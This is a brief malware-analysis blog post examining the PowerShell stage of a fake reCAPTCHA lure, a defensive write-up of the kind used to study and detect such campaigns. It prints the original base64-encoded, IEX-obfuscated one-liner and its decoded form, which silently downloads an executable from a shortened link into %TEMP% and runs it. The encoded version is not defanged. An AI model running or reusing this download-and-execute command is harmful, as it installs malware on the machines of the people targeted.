Analysis Fake reCAPTCHA ( Powershell Stage )

Analysis Fake reCAPTCHA ( Powershell Stage ) Skip to main content Analysis Fake reCAPTCHA ( Powershell Stage ) By Diyar Saadi | WIN32 July 16, 2025 Hello friends, in this article we will talk about how to analyze a PowerShell code that is encoded and also taken from Fake Captcha. As mentioned in the previous article. Read recent blog : https://reversethemalware.blogspot.com/2025/07/analysis-malicious-recaptcha.html Malicious Powershell Code : [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgJFByb2dyZXNzUHJlZmVyZW5jZT0nU2lsZW50bHlDb250aW51ZSc7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgInJlYnJhbmQubHkvb3BlbkNhcHRjaGEiIC1PdXRGaWxlICRlbnY6VEVNUFxLakdyeU5TdS5leGU7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRlbnY6VEVNUFxLakdyeU5TdS5leGU='))|I`e`X Decoded Malicious Powershell Code ( CyberChef ) : Decode Malicious Code : powershell.exe -Command $ProgressPreference='SilentlyContinue'; Invoke-WebRequest -Uri "rebrand[.ly]/openCaptcha" -OutFile $env:TEMP\KjGryNSu.exe; Start-Process -FilePath $env:TEMP\KjGryNSu.exe in this decoded malicious powershell code it start downloading silently this : KjGryNSu.exe . then start execution it from the dropped path from %TEMP% folder . Comments Post a Comment